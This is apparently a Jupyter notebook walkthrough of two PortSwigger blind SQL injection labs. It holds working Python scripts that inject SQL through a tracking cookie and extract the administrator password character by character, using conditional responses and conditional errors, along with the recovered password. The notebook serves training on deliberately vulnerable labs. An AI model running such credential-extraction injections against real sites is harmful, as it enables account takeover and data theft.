https://portswigger.net/web-security/sql-injection/blind

# Blind SQLi with conditional response
https://portswigger.net/web-security/sql-injection/blind/lab-conditional-responses

In [1]:
import requests
import re
import string
from tqdm import tqdm

In [2]:
URL = "https://acec1f3b1e2ef908c0af447500f80015.web-security-academy.net/"

#Create session to track cookies
s = requests.Session()
r = s.get(URL)

#String that may or may not contain "Welcome back":
re.findall(r"<section class=\"top-links\">[\s\S]*?</section>", r.text)

['<section class="top-links">\n                            <a href=/>Home</a><p>|</p>\n                            <a href="/my-account">My account</a><p>|</p>\n                        </section>']

Repeat GET again to observe "Welcome back":

In [3]:
r = s.get(URL)
re.findall(r"<section class=\"top-links\">[\s\S]*?</section>", r.text)

['<section class="top-links">\n                            <a href=/>Home</a><p>|</p>\n                            <div>Welcome back!</div><p>|</p>\n                            <a href="/my-account">My account</a><p>|</p>\n                        </section>']

We can put this in a function for more concise syntax

In [4]:
def is_welcome_back(text):
    if text == []:
        print("Session expired")
        return None
    return "Welcome back" in re.findall(r"<section class=\"top-links\">[\s\S]*?</section>", text)[0]

is_welcome_back(r.text)

True

Ok now onto the lab itself. So the target data is:
```sql
SELECT password
FROM users
WHERE username = 'administrator'
```

We want to query this, and use SUBSTRING to iterate through the password letter by letter. We're given that the database is looking at the cookie, using a query like:

```sql
SELECT TrackingId 
FROM TrackedUsers 
WHERE TrackingId = 'u5YD3PapBcR4lN3e7Tj4' 
```

In [5]:
#Reset session
s = requests.Session()
r = s.get(URL)

#Get cookies to modify
cookies = s.cookies.get_dict()

password = ""
max_len = 32

for char_idx in range(max_len):
    found = 0
    
    for each_char in tqdm(string.digits + string.ascii_lowercase):

        injected_query = f"' OR SUBSTRING((SELECT password FROM users WHERE username = 'administrator'), {char_idx + 1}, 1) = '{each_char}' -- "
        cookies["TrackingId"] = injected_query
        r = s.get(URL, cookies=requests.cookies.cookiejar_from_dict(cookies))

        if is_welcome_back(r.text):
            #New password character found!
            password += each_char
            found = 1
            print(password)
            break
            
    if found == 0:
        break

 33%|███████████████████████████▋                                                       | 12/36 [00:18<00:36,  1.51s/it]


c


 81%|██████████████████████████████████████████████████████████████████▊                | 29/36 [00:43<00:10,  1.49s/it]


ct


  8%|███████                                                                             | 3/36 [00:05<01:01,  1.87s/it]


...

 72%|███████████████████████████████████████████████████████████▉                       | 26/36 [00:39<00:15,  1.51s/it]


ct3k28gfverwg3e4ntq


 11%|█████████▎                                                                          | 4/36 [00:06<00:55,  1.73s/it]


ct3k28gfverwg3e4ntq4


100%|███████████████████████████████████████████████████████████████████████████████████| 36/36 [00:49<00:00,  1.39s/it]


In [6]:
password

'ct3k28gfverwg3e4ntq4'

Yay!

# Blind SQLi with Conditional Errors
https://portswigger.net/web-security/sql-injection/blind/lab-conditional-errors

This problem is very similar to the above, so I won't write notes quite as thoroughly.

In [1]:
import requests
import re
import string
from tqdm import tqdm
import math

In [7]:
URL = "https://ac811f481ee841d7c05921ab00cd007e.web-security-academy.net/"

#Set up session
s = requests.session()
s.get(URL)

cookies = s.cookies.get_dict()
cookie_idx = 'TrackingId'

base_query = "' OR ((SELECT CASE WHEN ({}) THEN to_char(1/0) ELSE 'a' END FROM dual) = 'a') --"

In [16]:
class DBChecker:
    def __init__(self, URL, base_query, cookies, cookie_idx):
        self.URL = URL
        self.base_query = base_query
        self.cookies = cookies
        self.cookie_idx = cookie_idx
        
    def mod_cookie(self, content):
        self.cookies[self.cookie_idx] = content

    def check_database(self, pw_idx, relation, char_guess):

        statement = "SUBSTR((SELECT password FROM users " + \
            f"WHERE username = 'administrator'), {pw_idx}, 1) {relation} '{char_guess}'"

        query = base_query.format(statement)
        self.mod_cookie(query)

        r = requests.get(self.URL, cookies=requests.cookies.cookiejar_from_dict(self.cookies))

        print(r.status_code)
        if r.text == 'Internal Server Error':
            return True
        else:
            return False

In [17]:
#Binary Search
dbchecker = DBChecker(URL, base_query, cookies, cookie_idx)
password = ""
max_chars = 36
end = 0

#Irerate through password characters
for pw_idx in range(max_chars):
    
    #Check if this is the end
    if dbchecker.check_database(pw_idx, "=", '') == True:
        end = 1
        break
    
    #Test for password found
    found = 0
    
    candidates = (string.digits + string.ascii_lowercase)
    len_candidates = len(candidates)
    
    #Binary search through characters
    for _ in range(math.ceil(math.log2(len_candidates))):
        
        char_idx = len(candidates)//2
        char_guess = candidates[char_idx]
        
        result = dbchecker.check_database(pw_idx, "<", char_guess)
        
        if result == True:
            candidates = candidates[:char_idx]
        elif result == False:
            candidates = candidates[char_idx:]
            
        #If we only have one left
        if len(candidates) == 1:
            
            #Validate
            if dbchecker.check_database(pw_idx, "=", candidates[0]) == True:
                password += candidates[0]
                print(password)
                break
                
            else:
                end = 1
                break
                
    if end == 1:
        break


200
500
500
500
200
500
500
2
200
500
500


KeyboardInterrupt: 

In [13]:
r.status_code

200

In [11]:
#Brute Force

password = ""
max_chars = 36

#Irerate through password characters
for pw_idx in range(max_chars):
    
    found = 0
    
    for char_guess in (string.digits + string.ascii_lowercase):
        
        statement = "SUBSTR((SELECT password FROM users " + \
            f"WHERE username = 'administrator'), {pw_idx}, 1) = '{char_guess}'"

        query = base_query.format(statement)
        cookies[cookie_idx] = query

        r = requests.get(URL, cookies=requests.cookies.cookiejar_from_dict(cookies))

        if r.text == 'Internal Server Error':
            password += char_guess
            print(password)
            found = 1
            break
            
    if found == 0:
        break

KeyboardInterrupt: 